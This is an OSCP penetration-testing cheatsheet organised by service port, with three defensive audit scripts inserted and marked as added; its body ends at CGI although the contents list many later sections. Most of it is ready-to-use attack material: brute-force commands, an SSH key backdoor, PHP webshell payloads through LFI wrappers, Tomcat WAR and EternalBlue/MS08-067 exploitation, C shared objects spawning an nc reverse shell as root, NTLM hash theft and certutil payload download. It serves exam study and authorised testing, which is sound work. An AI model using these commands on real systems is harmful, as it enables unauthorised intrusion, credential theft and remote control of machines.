OSCP Personal Cheatsheet: September 18Th, 2020

This document provides a summary of tools and techniques for penetration testing including: port scanning with Nmap, brute forcing common services like SSH, FTP, exploiting vulnerabilities in software like Drupal, WordPress, Joomla, gaining remote access via SMB shares and RDP, and post-exploitation activities like privilege escalation. It covers ports 21-25, 53, 79-80, 110, 139, 443, 1433, 3306, 3389, 5900 and penetration testing methodology for each service.

Uploaded by mahesh yadav

OSCP personal cheatsheet

SEPTEMBER 18TH, 2020


• Enumeration
• NMAP
  o TCP
  o UDP
• FTP - 21
  o Brute force
  o Downloading file
  o Uploading file
• SSH - 22
  o Brute force
  o CVE-2008-0166
  o SSH backdoor - post exploitation
• DNS - 53
  o Zone transfer
  o DNS brute force
• FINGER - 79
  o User enumeration
  o Command execution
• HTTP - HTTPS - 80 - 443
  o Automatic scanners
  o Wordpress
    ▪ Wordpress panel RCE
  o Drupal
    ▪ Username enumeration
    ▪ Hidden pages enumeration
    ▪ Drupal panel RCE
  o Joomla
  o Tomcat
    ▪ Default credentials
    ▪ Brute force
    ▪ Tomcat panel RCE
  o WebDav
  o HTTP brute force authentication
    ▪ HTTP basic authentication
    ▪ HTTP GET request
    ▪ HTTP POST request
  o Spidering / Brute force directories / files
    ▪ File backups
  o Local File Inclusion / Remote File Inclusion - LFI / RFI
    ▪ Wrappers
    ▪ Wrapper php://filter
    ▪ Wrapper expect://
    ▪ Wrapper data://
    ▪ Wrapper php://input
    ▪ Useful LFI list
    ▪ Tools
  o Command injection
  o Deserialization
  o File upload
  o SQL injection
  o XSS
  o Other web vulnerabilities
  o Upload a file with PUT
• KERBEROS - 88
• POP3 - 110
  o Brute force
  o Read mail
• SNMP - 161
  o Brute force community string
  o Modifying SNMP values
• LDAP - 389
  o Scans
  o Graphical Interface
• SMB - 445
  o Version if nmap didn't detect it
  o Scan for vulnerability
  o Manual testing
  o Brute force
  o Mount a SMB share
  o Get a shell
  o EternalBlue (MS17-010)
    ▪ Check if vulnerable
    ▪ Prepare shellcodes and listeners
    ▪ Exploit
    ▪ If this doesn't work, try this one
  o MS08-067
  o CVE-2017-7494
• MSSQL - 1433
  o Get information
  o Brute force
  o Having credentials
  o Manual exploit
• NFS - 2049
  o Show Mountable NFS Shares
  o Mount a share
  o NFS misconfigurations
• MYSQL - 3306
  o Brute force
  o Extracting MySQL credentials from files
  o Connect
  o MySQL commands
  o Manual exploit
• RDP - 3389
  o Brute force
  o Connect with known credentials / hash
  o Session stealing
    ▪ Get opened sessions
    ▪ Access to the selected
  o Adding user to RDP group (Windows)
• VNC - 5800 - 58001 - 5900 - 5901
  o Scans
  o Brute force
  o Connect
  o Found VNC password
    ▪ Linux
    ▪ Windows
  o Decrypt VNC password
• WINRM - 5985 - 5986
  o Brute force
  o Connecting
• CGI
  o Found CGI scripts
• Command and control framework
• Compiling exploits
  o For linux
  o For windows
  o Cross compile
• DICTIONARY GENERATION
• FILE TRANSFER
  o Linux
  o Windows
• GIT
  o Download .git
  o Extract .git content
• HASHES
  o Windows
  o Linux
• MIMIKATZ
• MISCELLANEOUS
  o Get a Windows path without spaces
• MSFVENOM PAYLOAD
  o Linux
  o Windows
  o PHP
  o ASP
  o JSP
  o WAR
  o Python
  o Bash
  o Perl
  o Listener
    ▪ Metasploit
    ▪ Netcat
• PASSWORD CRACKING
  o Online
  o Hashcat
    ▪ Linux password
    ▪ Windows password
    ▪ Others
    ▪ Rules
  o John
• PIVOTING
  o Sshuttle
  o Proxychains
• PRIVILEGE ESCALATION
  o Linux
    ▪ Enumeration scripts
    ▪ Vulnerability scan
    ▪ Suid checker
    ▪ Methodology to follow
  o Windows
    ▪ Enumeration scripts
    ▪ General scans
    ▪ Search for CVE
    ▪ Post exploitation
    ▪ JuicyPotato (SeImpersonate or SeAssignPrimaryToken)
    ▪ Methodology to follow
    ▪ Autorun
      ▪ Detection
      ▪ Exploitation
    ▪ AlwaysInstallElevated
      ▪ Detection
      ▪ Exploitation
    ▪ Executable Files
      ▪ Detection
      ▪ Exploitation
    ▪ Startup applications
      ▪ Detection
      ▪ Exploitation
    ▪ Weak service permission
      ▪ Detection
      ▪ Exploitation
    ▪ Unquoted service paths
      ▪ Detection
      ▪ Exploitation
    ▪ Hot potato
      ▪ Exploitation
    ▪ CVE
      ▪ Windows XP
      ▪ Windows 7
      ▪ Windows 8
      ▪ Windows 10
      ▪ Windows Server 2003
• PROOFS
  o Linux
  o Windows
• REVERSE SHELL
  o Amazing tool for shell generation
  o Bash
  o Perl
  o Python
  o Netcat
  o More reverse shell
  o Interactive shell
  o Adjust Interactive shell
• SHELLSHOCK
• USEFUL LINUX COMMANDS
  o Find a file
  o Active connection
  o List all SUID files
  o Determine the current version of Linux
  o Determine more information about the environment
  o List processes running
  o List the allowed (and forbidden) commands for the invoking user
• USEFUL WINDOWS COMMANDS
• ZIP

Enumeration
nmap -sn -v <IP>/CIDR
nmapAutomator <IP> All
autorecon <IP>/CIDR
NMAP
TCP
sudo nmap -sS -sC -sV -oA <NAME>.tcp <IP> -v

UDP
sudo nmap -sU -sS -sC -sV -oA <NAME>.udp <IP> -v

FTP - 21
Brute force
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ftp://<IP> -u -vV

Downloading file
ftp <IP>
PASSIVE
BINARY
get <FILE>

Uploading file
ftp <IP>
PASSIVE
BINARY
put <FILE>

SSH - 22
Brute force
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> ssh://<IP> -u -vV

CVE-2008-0166
All SSL and SSH keys generated on Debian-based systems (Ubuntu, Kubuntu, etc) between
September 2006 and May 13th, 2008 may be affected.

https://www.exploit-db.com/exploits/5720

wget https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2 https://github.com/g0tmi1k/debian-ssh/raw/master/common_keys/debian_ssh_dsa_1024_x86.tar.bz2

bunzip2 debian_ssh_rsa_2048_x86.tar.bz2 debian_ssh_dsa_1024_x86.tar.bz2


tar -xvf debian_ssh_rsa_2048_x86.tar
tar -xvf debian_ssh_dsa_1024_x86.tar

python 5720.py rsa/2048 <IP> <USER> <PORT> <THREADS>
python 5720.py dsa/1024 <IP> <USER> <PORT> <THREADS>

SSH backdoor - post exploitation


# Attacker
ssh-keygen -f <FILENAME>
chmod 600 <FILENAME>
cat <FILENAME>.pub -> copy the public key line

# Victim (append the copied public key, not the file name)
echo '<PUBLIC_KEY>' >> <PATH>/.ssh/authorized_keys

# Connect
ssh -i <FILENAME> <USER>@<IP>
DNS - 53
dnsenum <DOMAIN>
dnsrecon -d <DOMAIN>

Zone transfer
dnsrecon -d <DOMAIN> -a
dig axfr <DOMAIN> @<NAMESERVER>

DNS brute force


https://github.com/blark/aiodnsbrute

FINGER - 79
User enumeration
finger @<IP>
finger <USER>@<IP>

Command execution
finger "|/bin/id@<IP>"
finger "|/bin/ls -a /@<IP>"

HTTP - HTTPS - 80 - 443


Automatic scanners
nikto -h <URL>
python crawleet.py -u <URL> -b -d 3 -e jpg,png,css -f -m -s -x php,txt -y --threads 20

Wordpress
# Scan
wpscan --rua -e --url <URL>

# Brute force user(s)


wpscan --rua --url <URL> -P <PASSWORDS_LIST> -U "<USER>,<USER>"

Wordpress panel RCE

Modifying a php from the theme used (admin credentials needed)

Appearance -> Editor -> 404 Template (at the right)


Change the content for a php shell
https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
http://<IP>/wp-content/themes/twentytwelve/404.php

Drupal
droopescan scan -u <URL>

Username enumeration
In /user/register, just try to create a username; if the name is already taken you will be notified :
*The name admin is already taken*

If you request a new password for an existing username :


*Unable to send e-mail. Contact the site administrator if the problem persists.*

If you request a new password for a non-existent username :


*Sorry, test is not recognized as a user name or an e-mail address.*

Accessing /user/<number> you can see the number of existing users :


- /user/1 -> Access denied (user exist)
- /user/2 -> Page not found (user doesn't exist)

Hidden pages enumeration


Fuzz /node/<NUMBER> where <NUMBER> is a number (from 1 to 500 for example).
You could find hidden pages (test, dev) which are not referenced by the search engines.

wfuzz -c -z range,1-500 --hc 404 <URL>/node/FUZZ

Drupal panel RCE


You need the php module to be installed (check by accessing /modules/php: a 403 means it exists, a 404 means the php module isn't installed).

Go to Modules -> (Check) PHP Filter -> Save configuration

https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php

Then click on Add content -> Select Basic Page or Article -> Write php shellcode in the body -> Select PHP code in Text format -> Select Preview

Joomla
joomscan -u <URL>
./joomlavs.rb --url <URL> -a -v

Tomcat
Default credentials
The most interesting path of Tomcat is /manager/html, inside that path you can upload
and deploy war files (execute code). But this path is protected by basic HTTP auth,
the most common credentials are :

admin:admin
tomcat:tomcat
admin:<NOTHING>
admin:s3cr3t
tomcat:s3cr3t
admin:tomcat
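
As an added example (not part of the original cheatsheet), a POSIX shell audit of a Tomcat tomcat-users.xml that flags accounts using one of the default pairs above or holding a manager role that can reach /manager; the XML file and the DEFAULT_CREDS list are constructed here for the example.

```shell
#!/bin/sh
# Audit tomcat-users.xml for the two things the cheatsheet's Tomcat section
# relies on: default credentials and accounts with a manager-* role (the
# roles that allow WAR deployment through /manager). Constructed sample
# below; on a real install run:
#   audit_tomcat_users "$CATALINA_BASE/conf/tomcat-users.xml"

TOMCAT_USERS=$(mktemp)
cat > "$TOMCAT_USERS" <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="tomcat" roles="manager-gui"/>
  <user username="admin" password="" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Ae2o8uQ4xW1kP9rZ" roles="manager-script"/>
  <user username="reader" password="s3cr3t" roles="probe"/>
</tomcat-users>
EOF

# The default pairs listed in the cheatsheet, as "user:password"
# (an empty password is written as "admin:").
DEFAULT_CREDS="admin:admin tomcat:tomcat admin: admin:s3cr3t tomcat:s3cr3t admin:tomcat"

# xml_attr TAG NAME: value of attribute NAME inside one <user .../> tag.
xml_attr() {
    printf '%s\n' "$1" | sed -n "s/.*[[:space:]]$2=\"\([^\"]*\)\".*/\1/p"
}

# audit_tomcat_users FILE: prints "USERNAME FINDING" lines where FINDING is
#   default-credentials  the user:password pair is in DEFAULT_CREDS
#   manager-role         the account holds a manager-* role
audit_tomcat_users() {
    grep -o '<user [^>]*/>' "$1" | while read -r tag; do
        user=$(xml_attr "$tag" username)
        pass=$(xml_attr "$tag" password)
        roles=$(xml_attr "$tag" roles)
        for pair in $DEFAULT_CREDS; do
            if [ "$user:$pass" = "$pair" ]; then
                printf '%s default-credentials\n' "$user"
            fi
        done
        case ",$roles," in
            *,manager-gui,*|*,manager-script,*|*,manager-jmx,*|*,manager-status,*)
                printf '%s manager-role\n' "$user" ;;
        esac
    done
}

# count_findings FILE: total number of findings.
count_findings() {
    audit_tomcat_users "$1" | wc -l | tr -d ' '
}

audit_tomcat_users "$TOMCAT_USERS"
```

Any account reported with both findings is exactly the situation the brute-force and panel RCE steps below depend on.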

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -f <IP> http-get /manager/html -vV -u

Tomcat panel RCE


# Generate payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war

# Upload payload
Tomcat6 :
wget 'http://<USER>:<PASSWORD>@<IP>:8080/manager/deploy?war=file:shell.war&path=/shell' -O -

Tomcat7 and above :


curl -v -u <USER>:<PASSWORD> -T shell.war 'http://<IP>:8080/manager/text/deploy?path=/shell&update=true'

# Listener
nc -lvp <PORT>

# Execute payload
curl http://<IP>:8080/shell/

WebDav
davtest -url <URL>

HTTP brute force authentication


HTTP basic authentication

# Hydra
hydra -l <USER> -V -P <PASSWORDS_LIST> -s 80 -f <IP> http-get /<URL_ENDPOINT>/ -t 15
# Patator
python patator.py http_fuzz auth_type=basic url=<URL> user_pass=FILE0 0=<USER:PASSWORD_LIST> -x ignore:code=401 -x ignore:code=307

HTTP GET request


hydra <IP> -V -l <USER> -P <PASSWORDS_LIST> http-get-form "/login/:username=^USER^&password=^PASS^:F=Error:H=Cookie: safe=yes; PHPSESSID=12345myphpsessid" -t <THREADS_NUMBER>

HTTP POST request


hydra -l <USER> -P <PASSWORDS_LIST> <IP> http-post-form "/webapp/login.php:username=^USER^&password=^PASS^:Invalid" -t <THREADS_NUMBER>

Spidering / Brute force directories / files


gospider -d <DEPTHS> --robots --sitemap -t <THREADS> -s <URL>

ffuf -w /home/liodeus/directory-list-lowercase-2.3-medium.txt -u <URL>/FUZZ -e .php,.txt -t <THREADS>
dirbuster

Dictionaries :
- /usr/share/wordlists/dirb/common.txt
- /usr/share/wordlists/dirb/big.txt
- /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

File backups
Once you have found all the files, look for backups of all the executable files (“.php”, “.aspx“…).
Common variations for naming a backup are

file.ext~, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old
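
As an added example (not part of the original cheatsheet), a POSIX shell audit that applies the backup naming variations above to every server-side script under a web root, so an operator can find such copies before a spider does; the web root and its files are constructed here for the example.

```shell
#!/bin/sh
# Audit a web root for leftover backup copies of server-side scripts, using
# the naming variations listed above (file.ext~, file.ext.bak, file.ext.tmp,
# file.ext.old, file.bak, file.tmp, file.old). The web server normally serves
# such copies as plain text, so they leak source code and any credentials in
# it. The web root below is constructed for this example; on a real host run:
#   find_backups /var/www/html

WEBROOT=$(mktemp -d)
mkdir -p "$WEBROOT/admin"
: > "$WEBROOT/index.php"
: > "$WEBROOT/index.php~"          # editor backup
: > "$WEBROOT/config.php"
: > "$WEBROOT/config.php.bak"      # manual copy
: > "$WEBROOT/config.old"          # extension replaced
: > "$WEBROOT/admin/login.aspx"
: > "$WEBROOT/admin/login.aspx.tmp"
: > "$WEBROOT/style.css"           # not a script: never reported
: > "$WEBROOT/style.css.bak"

# backup_candidates PATH: print the seven backup names for one script path.
backup_candidates() {
    base=${1%.*}                   # path without its final extension
    printf '%s\n' "$1~" "$1.bak" "$1.tmp" "$1.old" \
                  "$base.bak" "$base.tmp" "$base.old"
}

# find_backups ROOT: print every existing backup variant of every server-side
# script (.php, .asp, .aspx, .jsp) under ROOT, as paths relative to ROOT.
find_backups() {
    root=$1
    find "$root" -type f \( -name '*.php' -o -name '*.asp' \
                           -o -name '*.aspx' -o -name '*.jsp' \) |
    while read -r script; do
        backup_candidates "$script" | while read -r candidate; do
            if [ -f "$candidate" ]; then
                rel=${candidate#"$root"/}
                printf '%s\n' "$rel"
            fi
        done
    done | sort
}

# count_backups ROOT: number of backup files found under ROOT.
count_backups() {
    find_backups "$1" | wc -l | tr -d ' '
}

find_backups "$WEBROOT"
```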

Local File Inclusion / Remote File Inclusion - LFI / RFI


https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

Wrappers
Wrapper php://filter

http://example.com/index.php?page=php://filter/convert.base64-encode/resource=

Wrapper expect://

http://example.com/index.php?page=expect://id

Wrapper data://

echo '<?php phpinfo(); ?>' | base64 -w0 -> PD9waHAgcGhwaW5mbygpOyA/Pgo=

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA/Pgo=

If there is code execution you should see the phpinfo() output; look at disable_functions and build a payload with functions that aren't disabled.

Code execution with


- exec
- shell_exec
- system
- passthru
- popen

# Example
echo '<?php passthru($_GET["cmd"]);echo "Shell done !"; ?>' | base64 -w0 -> PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=

If "Shell done !" appears on the webpage, then there is code execution and you can do things like :

http://example.com/index.php?page=data://text/plain;base64,PD9waHAgcGFzc3RocnUoJF9HRVRbImNtZCJdKTtlY2hvICJTaGVsbCBkb25lICEiOyA/Pgo=&cmd=ls

Wrapper php://input
curl -k -v "http://example.com/index.php?page=php://input" --data "<?php echo shell_exec('id'); ?>"

Useful LFI list

# Linux
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt

# Windows
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt

# Both
/home/liodeus/wordlist/SecLists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt

Tools
kadimus --url <URL>
python lfisuite.py

Command injection
For command injection always use BurpSuite !

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

Deserialization
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Deserialization

File upload
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files

SQL injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
https://cobalt.io/blog/a-pentesters-guide-to-sql-injection-sqli

XSS
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection

beef-xss
cat /usr/share/beef-xss/config.yaml | grep user -C 1 # user / password
<script src="http://<IP>:3000/hook.js"></script>

Other web vulnerabilities


https://github.com/swisskyrepo/PayloadsAllTheThings

Upload a file with PUT


curl -X PUT http://<IP>/<FILE> -d @<FILE> -v

KERBEROS - 88
https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

POP3 - 110
Brute force
hydra -l <USER> -P <PASSWORDS_LIST> -f <IP> pop3 -V
hydra -S -v -l <USER> -P <PASSWORDS_LIST> -s 995 -f <IP> pop3 -V

Read mail
telnet <IP> 110
USER <USER>
PASS <PASSWORD>
LIST
RETR <MAIL_NUMBER>
QUIT

SNMP - 161
Brute force community string
onesixtyone -c /home/liodeus/wordlist/SecLists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt <IP>
snmpbulkwalk -c <COMMUNITY_STRING> -v<VERSION> <IP>
snmp-check <IP>

Modifying SNMP values


http://net-snmp.sourceforge.net/tutorial/tutorial-5/commands/snmpset.html

LDAP - 389
Scans
nmap -n -sV --script "ldap* and not brute" <IP>

ldapsearch -h <IP> -x -s base


ldapsearch -h <IP> -x -D '<DOMAIN>\<USER>' -w '<PASSWORD>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"

Graphical Interface
jxplorer

SMB - 445
Version if nmap didn’t detect it
Sometimes nmap doesn't show the version of Samba on the remote host. If this happens, a good way to find out which version it is running is to capture traffic with Wireshark against the remote host on 445/139, run smbclient -L in parallel and follow the TCP stream: the server's version string should appear in it.

OR

sudo ngrep -i -d <INTERFACE> 's.?a.?m.?b.?a.*[[:digit:]]' port 139


smbclient -L <IP>

Scan for vulnerability


nmap -p139,445 --script "smb-vuln-* and not(smb-vuln-regsvc-dos)" --script-args smb-vuln-cve-2017-7494.check-version,unsafe=1 <IP>

If the scan reports :

- MS17-010 -> see EternalBlue (MS17-010) below
- MS08-067 -> see MS08-067 below
- CVE-2017-7494 -> see CVE-2017-7494 below

Manual testing
smbmap -H <IP>
smbmap -u '' -p '' -H <IP>
smbmap -u 'guest' -p '' -H <IP>
smbmap -u '' -p '' -H <IP> -R
crackmapexec smb <IP>
crackmapexec smb <IP> -u '' -p ''
crackmapexec smb <IP> -u 'guest' -p ''
crackmapexec smb <IP> -u '' -p '' --shares

enum4linux -a <IP>

smbclient --no-pass -L //<IP>


smbclient //<IP>/<SHARE>

# Download all files from a directory recursively


smbclient //<IP>/<SHARE> -U <USER> -c "prompt OFF;recurse ON;mget *"

Brute force
crackmapexec smb <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>
hydra -V -f -L <USERS_LIST> -P <PASSWORDS_LIST> smb://<IP> -u -vV

Mount a SMB share


mkdir /tmp/share
sudo mount -t cifs //<IP>/<SHARE> /tmp/share
sudo mount -t cifs -o 'username=<USER>,password=<PASSWORD>' //<IP>/<SHARE> /tmp/share

smbclient //<IP>/<SHARE>
smbclient //<IP>/<SHARE> -U <USER>

Get a shell
psexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
psexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

wmiexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
wmiexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>
smbexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP>
smbexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

atexec.py <DOMAIN>/<USER>:<PASSWORD>@<IP> <COMMAND>


atexec.py <DOMAIN>/<USER>@<IP> -hashes :<NTHASH>

EternalBlue (MS17-010)
https://github.com/3ndG4me/AutoBlue-MS17-010

Check if vulnerable
python eternal_checker.py <IP>

Prepare shellcodes and listeners


cd shellcode
./shell_prep.sh
cd ..
./listener_prep.sh

Exploit
python eternalblue_exploit<NUMBER>.py <IP> shellcode/sc_all.bin

May need to run it multiple times

If this doesn’t work, try this one

python zzz_exploit.py <IP>

MS08-067
# Download exploit code
git clone https://github.com/andyacer/ms08_067.git

# Generate payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
msfvenom -p windows/shell_bind_tcp RHOST=<IP> LPORT=<PORT> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

# Modify
Modify ms08_067_2018.py and replace the shellcode variable by the one generated with
msfvenom.

# Listener
nc -lvp <PORT>

# Exploit
python ms08_067_2018.py <IP> <NUMBER> 445

CVE-2017-7494
# Download exploit code
git clone https://github.com/joxeankoret/CVE-2017-7494

Create a new file named poc.c :

#define _GNU_SOURCE          /* setresuid() is a GNU extension on glibc */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Entry point smbd calls when it loads the shared object */
int samba_init_module(void)
{
    setresuid(0, 0, 0);            /* run as root inside the smbd process */
    system("ping -c 3 <IP>");      /* proof of execution: 3 ICMP echoes to the listener */
    return 0;
}
# Build
gcc -o test.so -shared poc.c -fPIC
# Start an ICMP listener
sudo tcpdump -i <INTERFACE> icmp

# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so

If you receive 3 pings on your listener then the exploit works. Now let's get a shell :

#define _GNU_SOURCE          /* setresuid() is a GNU extension on glibc */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Entry point smbd calls when it loads the shared object */
int samba_init_module(void)
{
    setresuid(0, 0, 0);            /* run as root inside the smbd process */
    /* named-pipe reverse shell to the netcat listener */
    system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f");
    return 0;
}
# Build
gcc -o test.so -shared poc.c -fPIC
# Start a listener
nc -lvp <PORT>

# Exploit
./cve_2017_7494.py -t <TARGET_IP> -u <USER> -P <PASSWORD> --custom=test.so

MSSQL - 1433
Get information
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

Brute force
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mssql -vV -I -u

Having credentials
mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<IP>
mssqlclient.py <USER>:<PASSWORD>@<IP>

# Once logged in you can run queries:


SQL> select @@version;

# Steal NTLM hash


sudo smbserver.py -smb2support liodeus .
SQL> exec master..xp_dirtree '\\<IP>\liodeus\' # Steal the NTLM hash, crack it with john or hashcat

# Try to enable code execution


SQL> enable_xp_cmdshell

# Execute code
SQL> xp_cmdshell whoami /all
SQL> xp_cmdshell certutil.exe -urlcache -split -f http://<IP>/nc.exe

Manual exploit
Cheatsheet :
- https://www.asafety.fr/mssql-injection-cheat-sheet/

NFS - 2049
Show Mountable NFS Shares
showmount -e <IP>
nmap --script=nfs-showmount -oN mountable_shares <IP>

Mount a share
sudo mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
sudo mount -v -t nfs -o vers=2 <IP>:<SHARE> <DIRECTORY>

NFS misconfigurations
# List exported shares
cat /etc/exports

If you find some directory that is configured as no_root_squash/no_all_squash you may be able to
privesc.

# Attacker, as root user

mkdir <DIRECTORY>
mount -v -t nfs <IP>:<SHARE> <DIRECTORY>
cd <DIRECTORY>
printf '#include <stdlib.h>\n#include <unistd.h>\nint main(void){setreuid(0,0); system("/bin/bash"); return 0;}\n' > pwn.c
gcc pwn.c -o pwn
chmod +s pwn

# Victim

cd <SHARE>
./pwn # Root shell
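
As an added example (not part of the original cheatsheet), a POSIX shell audit of an exports file that flags the no_root_squash / no_all_squash / insecure options and exports open to every host, which is the misconfiguration the steps above abuse; the exports content is constructed here for the example.

```shell
#!/bin/sh
# Audit an exports file for the settings the cheatsheet warns about:
# no_root_squash (a client's root stays root on the share), no_all_squash,
# insecure (requests accepted from unprivileged source ports) and exports
# granted to every host ("*"). The exports content below is constructed for
# this example; on a real server run:
#   audit_exports /etc/exports

SAMPLE_EXPORTS=$(mktemp)
cat > "$SAMPLE_EXPORTS" <<'EOF'
# /etc/exports: constructed sample for the audit below
/srv/safe      10.0.0.0/24(rw,sync,root_squash)
/srv/backup    *(rw,sync,no_root_squash,no_subtree_check)
/home/shared   10.0.0.5(ro,sync) 10.0.0.6(rw,no_all_squash)
/var/www       *(rw,insecure,no_root_squash)
EOF

# audit_exports FILE
# Prints one line per risky (path, client) pair: "PATH CLIENT REASON[,REASON]".
audit_exports() {
    # Drop comments and blank lines; each remaining line is "path client(opts) ..."
    sed -e 's/#.*//' -e '/^[[:space:]]*$/d' "$1" | while read -r path clients; do
        for spec in $clients; do
            case $spec in
                *\(*) client=${spec%%\(*}; opts=${spec#*\(}; opts=${opts%\)} ;;
                *)    client=$spec; opts="" ;;   # no option list: NFS defaults apply
            esac
            reasons=""
            case ",$opts," in *,no_root_squash,*) reasons="${reasons}no_root_squash," ;; esac
            case ",$opts," in *,no_all_squash,*)  reasons="${reasons}no_all_squash," ;; esac
            case ",$opts," in *,insecure,*)       reasons="${reasons}insecure," ;; esac
            if [ "$client" = "*" ]; then
                reasons="${reasons}any_host,"
            fi
            if [ -n "$reasons" ]; then
                printf '%s %s %s\n' "$path" "$client" "${reasons%,}"
            fi
        done
    done
}

# count_risky FILE: number of flagged (path, client) pairs.
count_risky() {
    audit_exports "$1" | wc -l | tr -d ' '
}

audit_exports "$SAMPLE_EXPORTS"
```

Exports that are flagged with no_root_squash and rw are the ones where the SUID trick above works; root_squash (the default) maps the client's root to nobody and defeats it.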

MYSQL - 3306
Brute force
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mysql -vV -I -u

Extracting MySQL credentials from files


cat /etc/mysql/debian.cnf
grep -oaE "[-_.*a-zA-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

Connect
# Local
mysql -u <USER>
mysql -u <USER> -p

# Remote
mysql -h <IP> -u <USER>

MySQL commands
show databases;
use <DATABASE>;

show tables;
describe <TABLE>;

select * from <TABLE>;

# Try to execute code


select do_system('id');
\! sh

# Read & Write


select load_file('<FILE>');
select 1,2,"<?php echo shell_exec($_GET['c']);?>",4 into OUTFILE '<OUT_FILE>';

Manual exploit
Cheatsheet :
- https://www.asafety.fr/mysql-injection-cheat-sheet/

RDP - 3389
Brute force
crowbar -b rdp -s <IP>/CIDR -u <USER> -C <PASSWORDS_LIST>
crowbar -b rdp -s <IP>/CIDR -U <USERS_LIST> -C <PASSWORDS_LIST>

hydra -f -L <USERS_LIST> -P <PASSWORDS_LIST> rdp://<IP> -u -vV

Connect with known credentials / hash


rdesktop -u <USERNAME> <IP>
rdesktop -d <DOMAIN> -u <USERNAME> -p <PASSWORD> <IP>

xfreerdp /u:[DOMAIN\]<USERNAME> /p:<PASSWORD> /v:<IP>


xfreerdp /u:[DOMAIN\]<USERNAME> /pth:<HASH> /v:<IP>

Session stealing
Get opened sessions

query user

Access the selected session


tscon <ID> /dest:<SESSIONNAME>

Adding user to RDP group (Windows)


net localgroup "Remote Desktop Users" <USER> /add

VNC - 5800 - 58001 - 5900 - 5901


Scans
nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -v -p <PORT> <IP>

Brute force
hydra -L <USERS_LIST> -P <PASSWORDS_LIST> -s <PORT> <IP> vnc -u -vV

Connect
vncviewer <IP>:<PORT>

Found VNC password


Linux
Default password is stored in: ~/.vnc/passwd

Windows
# RealVNC
HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\vncserver

# TightVNC
HKEY_CURRENT_USER\Software\TightVNC\Server

# TigerVNC
HKEY_LOCAL_MACHINE\Software\TigerVNC\WinVNC4

# UltraVNC
C:\Program Files\UltraVNC\ultravnc.ini

Decrypt VNC password


msfconsole
irb
fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
require 'rex/proto/rfb'
Rex::Proto::RFB::Cipher.decrypt ["2151D3722874AD0C"].pack('H*'), fixedkey

WINRM - 5985 - 5986


Brute force
crackmapexec winrm <IP> -u <USERS_LIST> -p <PASSWORDS_LIST>

Connecting
evil-winrm -i <IP> -u <USER> -p <PASSWORD>
evil-winrm -i <IP> -u <USER> -H <HASH>

CGI
Found CGI scripts
ffuf -w /home/liodeus/wordlist/SecLists/Discovery/Web-Content/CGI-XPlatform.fuzz.txt -u <URL>/cgi-bin/FUZZ -t 50
